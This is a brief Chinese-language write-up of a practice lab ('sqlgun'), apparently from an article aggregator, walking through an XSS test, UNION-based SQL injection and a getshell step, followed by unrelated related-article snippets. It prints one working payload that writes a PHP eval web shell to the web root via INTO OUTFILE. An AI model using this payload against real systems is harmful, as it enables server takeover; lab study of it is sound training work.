sqlgun靶场漏洞挖掘

news/2024/11/15 1:27:56/

进入首页首先看到一个搜索框,那么我们试一下xss

用script弹了个一

接下来我们尝试一下sql注入

这里我们使用联合查询查到了他的数据库名,那么这里也就存在SQL注入了

这里存在SQL注入那么我们就尝试一下是否可以注入木马来getshell

首先我们扫描目录,找到phpinfo页面

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/yynzj.php' #

然后去访问

进行连接

成功getshell


http://www.ppmy.cn/news/1528173.html

相关文章

谷神后端list转map

list转map /*** list2map* list转map&#xff1a;支持全量映射、单字段映射。* * param $list:list:列表。* param $key:string:键。* param $field:string:值字段域。** return map**/ #function list2map($list, $key, $field)#if ($vs.util.isList($list) and $vs.util.is…

小琳AI课堂:MASS模型——革新自然语言处理的预训练技术

大家好&#xff0c;这里是小琳AI课堂。今天我们来聊聊一个在自然语言处理&#xff08;NLP&#xff09;领域非常热门的话题——MASS模型&#xff0c;全称是Masked Sequence to Sequence Pre-training for Language Generation。这是华为诺亚方舟实验室在2019年提出的一种创新模型…

用 Docker 部署 Seafile 社区版

快速开始 本文档使用以下约定&#xff1a; /opt/seafile-data是 Seafile 的目录。 如果您将 Seafile 放在不同的目录中&#xff0c;请相应地调整所有路径。Seafile 使用两个 Docker 卷 来保存其数据库和 Seafile Docker 容器中生成的数据。卷的主机路径分别是/opt/seafile-my…

USB组合设备——串口+鼠标+键盘

文章目录 USB组合设备——串口+鼠标+键盘描述符结构设备描述符配置描述符集合配置描述符接口关联描述符键盘接口描述符鼠标接口描述符类特殊命令CDC 的类特殊命令HID 的类特殊命令接口 2接口3USB组合设备——串口+鼠标+键盘 描述符结构 设备描述符 配置描述符 接口关联描述符…

计算机人工智能前沿进展-大语言模型方向-2024-09-12

计算机人工智能前沿进展-大语言模型方向-2024-09-12 1. PharmaBench: Enhancing ADMET benchmarks with large language models Z Niu, X Xiao, W Wu, Q Cai, Y Jiang, W Jin, M Wang… - Scientific Data, 2024 大语言模型在药物发现中的应用&#xff1a;PharmaBench 文章由…

k8s云平台部署文档

一、基本环境配置 Markdown添加图片方式:https://www.jianshu.com/p/280c6a6f2594 1.修改主机名并配置映射 所有节点修改主机名并配置映射:echo 10.104.44.23 master 10.104.44.21 node >> /etc/hosts2.配置防火墙和selinux 控制/计算节点都关闭selinux和防火墙编…

基于Ubuntu2404搭建mysql8配置远程访问

使用系统为Ubuntu2404&#xff0c;mysql8版本为8.0.36 安装mysql apt install -y mysql-server设置开机自启动 systemctl enable --now mysql修改密码&#xff0c;似乎是bug&#xff0c;修改密码第一次不成功&#xff0c;第二次可以 mysql use mysql; update user set Host…

【C++ Primer Plus习题】16.10

大家好,这里是国中之林! ❥前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&#xff0c;忍不住分享一下给大家。点击跳转到网站。有兴趣的可以点点进去看看← 问题: 解答: #include <iostream> #include <string> #include <…